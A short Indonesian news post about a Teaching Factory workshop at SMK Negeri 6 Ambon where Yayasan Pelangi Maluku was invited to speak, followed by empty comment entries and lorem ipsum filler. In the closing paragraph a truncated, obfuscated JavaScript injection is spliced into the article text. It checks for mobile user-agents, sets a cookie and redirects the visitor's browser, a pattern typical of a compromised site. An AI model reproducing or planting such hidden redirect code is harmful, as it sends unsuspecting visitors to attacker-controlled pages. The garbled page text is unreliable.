Workshop Teaching Factory di SMK Negeri 6 Ambon, YPM Jadi Narasumber

Kamis, 16 November 2017, A�Workshop Teaching factory yang diadakan di SMK Negeri 6 Ambon mengundang A�Yayasan Pelangi Maluku (YPM) sebagai Narasumber pada kegiatan ini. Seperti yang dibicarakan dalam Workshop Teaching Factory, kegiatan ini menitikberatkan pada metode yang harus dilancarkan oleh sekolah – sekolah kejuruan untuk dapat menciptakan generasi SMK yang siap pengetahuan serta skill (ketrampilan) yang tepat untuk siap terjun di dunia kerja. Hal ini menjadi sorotan yang harus terus digali, mengingat jumlah pengangguran di kota Ambon yang semakin bertambah.

YPM juga sangat memberi perhatian pada hal itu. Sehingga pada kegiatan ini, YPM berbagi pengalaman tentang apa saja yang selama ini telah dihasilkan oleh YPM. Mulai dari Pekerjaan Sosial yang dimotori Oleh YPM sendiri, Event Organizer (EO) yang dimotori Oleh Gaze’Bo Entertainment, Majalah JM, dan lainnya.

“Semua itu memang harus ada niat dan usaha dari diri kita sendiri. Dan untuk bisa berproses sampai sekarang ini memang sangat membutuhkan konsistensi dan skill yang cukup untuk bisa bertahan sesuai dengan permintaan zaman yang semakin menginginkan adanya inovasi. Tapi yang paling penting dari semua itu adalah kemauan kita untuk belajar. Dari yang belum tahu apa – apa, sampai mengerti segalanya. Semua butuh proses.” kata Direktur Yayasan Pelangi Maluku, Dra. Rosano. C. Pentury, M.Si.

Materi yang disajikan oleh YPM mendapat sambutan baik oleh para guru di SMK Negeri 6 Ambon yang mengikuti kegiatan tersebut. Begitu banyak pertanyaan yang dilontarkan oleh mereka. Antusias mereka menunjukan bahwa mereka pun inginkan perubahan menuju yang lebih baik. sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

1. admin
    admin says:

2. Mustisusti
    Mustisusti says:

Nullam dictum felis eu pede mollis pretium. Integer tincidunt. Cras dapibus. Vivamus elementum semper nisi. Aenean vulputate eleifend tellus. Aenean leo ligula, porttitor eu, consequat vitae, eleifend ac, enim. Aliquam lorem ante, dapibus in, viverra quis, feugiat a, tellus.Nulla consequat massa quis enim. Donec pede justo, fringilla vel, aliquet nec, vulputate eget, arcu. In enim justo, rhoncus ut, imperdiet a, venenatis vitae, justo.

Want to join the discussion?
Feel free to contribute!